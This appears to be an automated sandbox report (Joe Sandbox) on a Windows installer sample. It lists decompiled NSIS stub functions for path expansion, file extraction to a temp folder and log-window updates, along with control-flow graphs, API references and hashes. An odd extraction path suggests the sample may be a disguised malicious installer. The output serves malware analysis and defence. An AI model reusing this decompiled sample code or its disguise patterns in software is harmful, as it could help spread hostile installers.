                                                control_flow_graph 505 406544-40654f 506 406551-406560 505->506 507 406562-406578 505->507 506->507 508 406590-406599 507->508 509 40657a-406587 507->509 510 406774-40677f 508->510 511 40659f 508->511 509->508 512 406589-40658c 509->512 514 406781-406785 call 406507 510->514 515 40678a-40678b 510->515 513 4065a4-4065b1 511->513 512->508 513->510 516 4065b7-4065c0 513->516 514->515 518 406752 516->518 519 4065c6-406603 516->519 522 406760-406763 518->522 523 406754-40675e 518->523 520 4066f6-4066fb 519->520 521 406609-406610 519->521 525 4066fd-406703 520->525 526 40672e-406733 520->526 527 406612-406614 521->527 528 406615-406617 521->528 524 406765-40676e 522->524 523->524 524->510 529 4065a1 524->529 530 406713-40671f call 406507 525->530 531 406705-406711 call 40644e 525->531 534 406742-406750 lstrlenW 526->534 535 406735-40673d call 406544 526->535 527->528 532 406654-406657 528->532 533 406619-406637 call 4063d5 528->533 529->513 546 406724-40672a 530->546 531->546 536 406667-40666a 532->536 537 406659-406665 GetSystemDirectoryW 532->537 547 40663c-406640 533->547 534->524 535->534 543 4066d3-4066d5 536->543 544 40666c-40667a GetWindowsDirectoryW 536->544 542 4066d7-4066db 537->542 550 4066dd-4066e1 542->550 551 4066ee-4066f4 call 40678e 542->551 543->542 549 40667c-406684 543->549 544->543 546->534 548 40672c 546->548 547->550 552 406646-40664f call 406544 547->552 548->551 553 406686-40668f 549->553 554 40669b-4066b1 SHGetSpecialFolderLocation 549->554 550->551 555 4066e3-4066e9 lstrcatW 550->555 551->534 552->542 562 406697-406699 553->562 559 4066b3-4066cd SHGetPathFromIDListW CoTaskMemFree 554->559 560 4066cf 554->560 555->551 559->542 559->560 560->543 562->542 562->554
                                                C-Code - Quality: 72%
                                                			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                				struct _ITEMIDLIST* _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t44;
                                                				WCHAR* _t45;
                                                				signed char _t47;
                                                				signed int _t48;
                                                				short _t59;
                                                				short _t61;
                                                				short _t63;
                                                				void* _t71;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				short _t81;
                                                				short _t82;
                                                				signed char _t84;
                                                				signed int _t85;
                                                				void* _t98;
                                                				void* _t104;
                                                				intOrPtr* _t105;
                                                				void* _t107;
                                                				WCHAR* _t108;
                                                				void* _t110;
                                                
                                                				_t107 = __esi;
                                                				_t104 = __edi;
                                                				_t71 = __ebx;
                                                				_t44 = _a8;
                                                				if(_t44 < 0) {
                                                					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
                                                				}
                                                				_push(_t71);
                                                				_push(_t107);
                                                				_push(_t104);
                                                				_t105 =  *0x42a258 + _t44 * 2;
                                                				_t45 = 0x4281c0;
                                                				_t108 = 0x4281c0;
                                                				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
                                                					_t108 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				_t81 =  *_t105;
                                                				_a8 = _t81;
                                                				if(_t81 == 0) {
                                                					L43:
                                                					 *_t108 =  *_t108 & 0x00000000;
                                                					if(_a4 == 0) {
                                                						return _t45;
                                                					}
                                                					return E00406507(_a4, _t45);
                                                				} else {
                                                					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                						_t98 = 2;
                                                						_t105 = _t105 + _t98;
                                                						if(_t81 >= 4) {
                                                							if(__eflags != 0) {
                                                								 *_t108 = _t81;
                                                								_t108 = _t108 + _t98;
                                                								__eflags = _t108;
                                                							} else {
                                                								 *_t108 =  *_t105;
                                                								_t108 = _t108 + _t98;
                                                								_t105 = _t105 + _t98;
                                                							}
                                                							L42:
                                                							_t82 =  *_t105;
                                                							_a8 = _t82;
                                                							if(_t82 != 0) {
                                                								_t81 = _a8;
                                                								continue;
                                                							}
                                                							goto L43;
                                                						}
                                                						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                						_t47 =  *_t105;
                                                						_t48 = _t47 & 0x000000ff;
                                                						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                						_t85 = _t84 & 0x000000ff;
                                                						_v28 = _t48 | 0x00008000;
                                                						_t77 = 2;
                                                						_v16 = _t85;
                                                						_t105 = _t105 + _t77;
                                                						_v24 = _t48;
                                                						_v20 = _t85 | 0x00008000;
                                                						if(_a8 != _t77) {
                                                							__eflags = _a8 - 3;
                                                							if(_a8 != 3) {
                                                								__eflags = _a8 - 1;
                                                								if(__eflags == 0) {
                                                									__eflags = (_t48 | 0xffffffff) - _v12;
                                                									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                								}
                                                								L38:
                                                								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                								_t45 = 0x4281c0;
                                                								goto L42;
                                                							}
                                                							_t78 = _v12;
                                                							__eflags = _t78 - 0x1d;
                                                							if(_t78 != 0x1d) {
                                                								__eflags = (_t78 << 0xb) + 0x42b000;
                                                								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
                                                							} else {
                                                								E0040644E(_t108,  *0x42a228);
                                                							}
                                                							__eflags = _t78 + 0xffffffeb - 7;
                                                							if(__eflags < 0) {
                                                								L29:
                                                								E0040678E(_t108);
                                                							}
                                                							goto L38;
                                                						}
                                                						if( *0x42a2a4 != 0) {
                                                							_t77 = 4;
                                                						}
                                                						_t121 = _t48;
                                                						if(_t48 >= 0) {
                                                							__eflags = _t48 - 0x25;
                                                							if(_t48 != 0x25) {
                                                								__eflags = _t48 - 0x24;
                                                								if(_t48 == 0x24) {
                                                									GetWindowsDirectoryW(_t108, 0x400);
                                                									_t77 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										goto L26;
                                                									}
                                                									_t59 =  *0x42a224;
                                                									_t77 = _t77 - 1;
                                                									__eflags = _t59;
                                                									if(_t59 == 0) {
                                                										L22:
                                                										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                										__eflags = _t61;
                                                										if(_t61 != 0) {
                                                											L24:
                                                											 *_t108 =  *_t108 & 0x00000000;
                                                											__eflags =  *_t108;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                										_a8 = _t61;
                                                										__imp__CoTaskMemFree(_v8);
                                                										__eflags = _a8;
                                                										if(_a8 != 0) {
                                                											goto L26;
                                                										}
                                                										goto L24;
                                                									}
                                                									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
                                                									__eflags = _t63;
                                                									if(_t63 == 0) {
                                                										goto L26;
                                                									}
                                                									goto L22;
                                                								}
                                                								goto L26;
                                                							}
                                                							GetSystemDirectoryW(_t108, 0x400);
                                                							goto L26;
                                                						} else {
                                                							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040); // executed
                                                							if( *_t108 != 0) {
                                                								L27:
                                                								if(_v16 == 0x1a) {
                                                									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L29;
                                                							}
                                                							E00406544(_t77, _t105, _t108, _t108, _v16);
                                                							L26:
                                                							if( *_t108 == 0) {
                                                								goto L29;
                                                							}
                                                							goto L27;
                                                						}
                                                					}
                                                					goto L43;
                                                				}
                                                			}





























                                                0x00406544
                                                0x00406544
                                                0x00406544
                                                0x0040654a
                                                0x0040654f
                                                0x00406560
                                                0x00406560
                                                0x00406568
                                                0x00406569
                                                0x0040656a
                                                0x0040656b
                                                0x0040656e
                                                0x00406576
                                                0x00406578
                                                0x00406589
                                                0x0040658c
                                                0x0040658c
                                                0x00406590
                                                0x00406596
                                                0x00406599
                                                0x00406774
                                                0x00406774
                                                0x0040677f
                                                0x0040678b
                                                0x0040678b
                                                0x00000000
                                                0x0040659f
                                                0x004065a4
                                                0x004065b9
                                                0x004065ba
                                                0x004065c0
                                                0x00406752
                                                0x00406760
                                                0x00406763
                                                0x00406763
                                                0x00406754
                                                0x00406757
                                                0x0040675a
                                                0x0040675c
                                                0x0040675c
                                                0x00406765
                                                0x00406765
                                                0x0040676b
                                                0x0040676e
                                                0x004065a1
                                                0x00000000
                                                0x004065a1
                                                0x00000000
                                                0x0040676e
                                                0x004065c6
                                                0x004065c9
                                                0x004065d8
                                                0x004065df
                                                0x004065eb
                                                0x004065ee
                                                0x004065f1
                                                0x004065f2
                                                0x004065f7
                                                0x004065fd
                                                0x00406600
                                                0x00406603
                                                0x004066f6
                                                0x004066fb
                                                0x0040672e
                                                0x00406733
                                                0x00406738
                                                0x0040673d
                                                0x0040673d
                                                0x00406742
                                                0x00406748
                                                0x0040674b
                                                0x00000000
                                                0x0040674b
                                                0x004066fd
                                                0x00406700
                                                0x00406703
                                                0x00406718
                                                0x0040671f
                                                0x00406705
                                                0x0040670c
                                                0x0040670c
                                                0x00406727
                                                0x0040672a
                                                0x004066ee
                                                0x004066ef
                                                0x004066ef
                                                0x00000000
                                                0x0040672a
                                                0x00406610
                                                0x00406614
                                                0x00406614
                                                0x00406615
                                                0x00406617
                                                0x00406654
                                                0x00406657
                                                0x00406667
                                                0x0040666a
                                                0x00406672
                                                0x00406678
                                                0x00406678
                                                0x004066d3
                                                0x004066d3
                                                0x004066d5
                                                0x00000000
                                                0x00000000
                                                0x0040667c
                                                0x00406681
                                                0x00406682
                                                0x00406684
                                                0x0040669b
                                                0x004066a9
                                                0x004066af
                                                0x004066b1
                                                0x004066cf
                                                0x004066cf
                                                0x004066cf
                                                0x00000000
                                                0x004066cf
                                                0x004066b7
                                                0x004066c0
                                                0x004066c3
                                                0x004066c9
                                                0x004066cd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066cd
                                                0x00406695
                                                0x00406697
                                                0x00406699
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406699
                                                0x00000000
                                                0x004066d3
                                                0x0040665f
                                                0x00000000
                                                0x00406619
                                                0x00406637
                                                0x00406640
                                                0x004066dd
                                                0x004066e1
                                                0x004066e9
                                                0x004066e9
                                                0x00000000
                                                0x004066e1
                                                0x0040664a
                                                0x004066d7
                                                0x004066db
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066db
                                                0x00406617
                                                0x00000000
                                                0x004065a4

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040665F
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00000000,00418EC0,00000000), ref: 00406672
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000), ref: 00406743
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 4260037668-950738505
                                                • Opcode ID: caff3a63cdf462ad28e28b098a8ca9bbcc2bb6c884f685db01e738e9c1691dfa
                                                • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                                • Opcode Fuzzy Hash: caff3a63cdf462ad28e28b098a8ca9bbcc2bb6c884f685db01e738e9c1691dfa
                                                • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 563 40176f-401794 call 402da6 call 405e4d 568 401796-40179c call 406507 563->568 569 40179e-4017b0 call 406507 call 405dd6 lstrcatW 563->569 574 4017b5-4017b6 call 40678e 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 40683d 578->579 580 4017f2-4017f5 578->580 588 4017dd-4017ef 579->588 589 4017cd-4017db CompareFileTime 579->589 582 4017f7-4017f8 call 405fd2 580->582 583 4017fd-401819 call 405ff7 580->583 582->583 590 40181b-40181e 583->590 591 40188d-4018b6 call 405569 call 4032b4 583->591 588->580 589->588 592 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 590->592 593 40186f-401879 call 405569 590->593 605 4018b8-4018bc 591->605 606 4018be-4018ca SetFileTime 591->606 592->578 627 401864-401865 592->627 603 401882-401888 593->603 607 402c33 603->607 605->606 609 4018d0-4018db FindCloseChangeNotification 605->609 606->609 611 402c35-402c39 607->611 612 4018e1-4018e4 609->612 613 402c2a-402c2d 609->613 614 4018e6-4018f7 call 406544 lstrcatW 612->614 615 4018f9-4018fc call 406544 612->615 613->607 621 401901-402398 614->621 615->621 625 40239d-4023a2 621->625 626 402398 call 405b67 621->626 625->611 626->625 627->603 628 401867-401868 627->628 628->593
                                                C-Code - Quality: 61%
                                                			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                				void* __esi;
                                                				void* _t35;
                                                				void* _t43;
                                                				void* _t45;
                                                				FILETIME* _t51;
                                                				FILETIME* _t64;
                                                				void* _t66;
                                                				signed int _t72;
                                                				FILETIME* _t73;
                                                				FILETIME* _t77;
                                                				signed int _t79;
                                                				WCHAR* _t81;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t86;
                                                
                                                				_t77 = __ebx;
                                                				 *(_t86 - 8) = E00402DA6(0x31);
                                                				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                				_t35 = E00405E4D( *(_t86 - 8));
                                                				_push( *(_t86 - 8));
                                                				_t81 = L"Call";
                                                				if(_t35 == 0) {
                                                					lstrcatW(E00405DD6(E00406507(_t81, L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially\\Tygnings\\systemless")), ??);
                                                				} else {
                                                					E00406507();
                                                				}
                                                				E0040678E(_t81);
                                                				while(1) {
                                                					__eflags =  *(_t86 + 8) - 3;
                                                					if( *(_t86 + 8) >= 3) {
                                                						_t66 = E0040683D(_t81);
                                                						_t79 = 0;
                                                						__eflags = _t66 - _t77;
                                                						if(_t66 != _t77) {
                                                							_t73 = _t66 + 0x14;
                                                							__eflags = _t73;
                                                							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                						__eflags = _t72;
                                                						 *(_t86 + 8) = _t72;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) == _t77) {
                                                						E00405FD2(_t81);
                                                					}
                                                					__eflags =  *(_t86 + 8) - 1;
                                                					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                					__eflags = _t43 - 0xffffffff;
                                                					 *(_t86 - 0x38) = _t43;
                                                					if(_t43 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) != _t77) {
                                                						E00405569(0xffffffe2,  *(_t86 - 8));
                                                						__eflags =  *(_t86 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
                                                						__eflags =  *0x42a2a8;
                                                						goto L32;
                                                					} else {
                                                						E00406507("C:\Users\jones\AppData\Local\Temp\nskE115.tmp", _t83);
                                                						E00406507(_t83, _t81);
                                                						E00406544(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp\nskE115.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                						E00406507(_t83, "C:\Users\jones\AppData\Local\Temp\nskE115.tmp");
                                                						_t64 = E00405B67("C:\Users\jones\AppData\Local\Temp\nskE115.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                						__eflags = _t64;
                                                						if(_t64 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t64 == 1;
                                                							if(_t64 == 1) {
                                                								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
                                                								L32:
                                                								_t51 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t81);
                                                								_push(0xfffffffa);
                                                								E00405569();
                                                								L29:
                                                								_t51 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t51;
                                                				}
                                                				E00405569(0xffffffea,  *(_t86 - 8));
                                                				 *0x42a2d4 =  *0x42a2d4 + 1;
                                                				_push(_t77);
                                                				_push(_t77);
                                                				_push( *(_t86 - 0x38));
                                                				_push( *((intOrPtr*)(_t86 - 0x28)));
                                                				_t45 = E004032B4(); // executed
                                                				 *0x42a2d4 =  *0x42a2d4 - 1;
                                                				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                				_t84 = _t45;
                                                				if( *(_t86 - 0x24) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                				__eflags = _t84 - _t77;
                                                				if(_t84 >= _t77) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t84 - 0xfffffffe;
                                                					if(_t84 != 0xfffffffe) {
                                                						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
                                                					} else {
                                                						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                						lstrcatW(_t81,  *(_t86 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t81);
                                                					E00405B67();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}


















                                                0x0040176f
                                                0x00401776
                                                0x00401782
                                                0x00401785
                                                0x0040178a
                                                0x0040178d
                                                0x00401794
                                                0x004017b0
                                                0x00401796
                                                0x00401797
                                                0x00401797
                                                0x004017b6
                                                0x004017bb
                                                0x004017bb
                                                0x004017bf
                                                0x004017c2
                                                0x004017c7
                                                0x004017c9
                                                0x004017cb
                                                0x004017d0
                                                0x004017d0
                                                0x004017db
                                                0x004017db
                                                0x004017ec
                                                0x004017ee
                                                0x004017ee
                                                0x004017ef
                                                0x004017ef
                                                0x004017f2
                                                0x004017f5
                                                0x004017f8
                                                0x004017f8
                                                0x004017ff
                                                0x0040180e
                                                0x00401813
                                                0x00401816
                                                0x00401819
                                                0x00000000
                                                0x00000000
                                                0x0040181b
                                                0x0040181e
                                                0x00401874
                                                0x00401879
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c2d
                                                0x00000000
                                                0x00401820
                                                0x00401826
                                                0x0040182d
                                                0x0040183a
                                                0x00401845
                                                0x0040185b
                                                0x0040185b
                                                0x0040185e
                                                0x00000000
                                                0x00401864
                                                0x00401864
                                                0x00401865
                                                0x00401882
                                                0x00402c33
                                                0x00402c33
                                                0x00402c33
                                                0x00401867
                                                0x00401867
                                                0x00401868
                                                0x00401493
                                                0x0040239d
                                                0x0040239d
                                                0x0040239d
                                                0x00401865
                                                0x0040185e
                                                0x00402c35
                                                0x00402c39
                                                0x00402c39
                                                0x00401892
                                                0x00401897
                                                0x0040189d
                                                0x0040189e
                                                0x0040189f
                                                0x004018a2
                                                0x004018a5
                                                0x004018aa
                                                0x004018b0
                                                0x004018b4
                                                0x004018b6
                                                0x004018be
                                                0x004018ca
                                                0x004018b8
                                                0x004018b8
                                                0x004018bc
                                                0x00000000
                                                0x00000000
                                                0x004018bc
                                                0x004018d3
                                                0x004018d9
                                                0x004018db
                                                0x00000000
                                                0x004018e1
                                                0x004018e1
                                                0x004018e4
                                                0x004018fc
                                                0x004018e6
                                                0x004018e9
                                                0x004018f2
                                                0x004018f2
                                                0x00401901
                                                0x00401906
                                                0x00402398
                                                0x00000000
                                                0x00402398
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                  • Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,004033ED), ref: 004055C4
                                                  • Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll), ref: 004055D6
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nskE115.tmp$C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless$Call
                                                • API String ID: 1941528284-3521677325
                                                • Opcode ID: 65bccffe5e06326f75551bb9f8fdcf25cfe9e3226a81d0c778f20e467ed9889d
                                                • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                • Opcode Fuzzy Hash: 65bccffe5e06326f75551bb9f8fdcf25cfe9e3226a81d0c778f20e467ed9889d
                                                • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 629 405569-40557e 630 405584-405595 629->630 631 405635-405639 629->631 632 4055a0-4055ac lstrlenW 630->632 633 405597-40559b call 406544 630->633 635 4055c9-4055cd 632->635 636 4055ae-4055be lstrlenW 632->636 633->632 638 4055dc-4055e0 635->638 639 4055cf-4055d6 SetWindowTextW 635->639 636->631 637 4055c0-4055c4 lstrcatW 636->637 637->635 640 4055e2-405624 SendMessageW * 3 638->640 641 405626-405628 638->641 639->638 640->641 641->631 642 40562a-40562d 641->642 642->631
                                                C-Code - Quality: 100%
                                                			E00405569(signed int _a4, WCHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				WCHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				WCHAR* _t27;
                                                				signed int _t28;
                                                				long _t29;
                                                				signed int _t37;
                                                				signed int _t38;
                                                
                                                				_t27 =  *0x429204;
                                                				_v8 = _t27;
                                                				if(_t27 != 0) {
                                                					_t37 =  *0x42a2d4;
                                                					_v12 = _t37;
                                                					_t38 = _t37 & 0x00000001;
                                                					if(_t38 == 0) {
                                                						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
                                                					}
                                                					_t27 = lstrlenW(0x4226e8);
                                                					_a4 = _t27;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8); // executed
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x4226e8;
                                                							_v52 = 1;
                                                							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t38;
                                                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                						}
                                                						if(_t38 != 0) {
                                                							_t28 = _a4;
                                                							0x4226e8[_t28] = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t27 = lstrlenW(_a8) + _a4;
                                                						if(_t27 < 0x1000) {
                                                							_t27 = lstrcatW(0x4226e8, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t27;
                                                			}

















                                                0x0040556f
                                                0x00405579
                                                0x0040557e
                                                0x00405584
                                                0x0040558f
                                                0x00405592
                                                0x00405595
                                                0x0040559b
                                                0x0040559b
                                                0x004055a1
                                                0x004055a9
                                                0x004055ac
                                                0x004055c9
                                                0x004055cd
                                                0x004055d6
                                                0x004055d6
                                                0x004055e0
                                                0x004055e9
                                                0x004055f5
                                                0x004055fc
                                                0x00405600
                                                0x00405603
                                                0x00405616
                                                0x00405624
                                                0x00405624
                                                0x00405628
                                                0x0040562a
                                                0x0040562d
                                                0x00000000
                                                0x0040562d
                                                0x004055ae
                                                0x004055b6
                                                0x004055be
                                                0x004055c4
                                                0x00000000
                                                0x004055c4
                                                0x004055be
                                                0x004055ac
                                                0x00405639

                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                • lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,004033ED), ref: 004055C4
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll), ref: 004055D6
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                  • Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
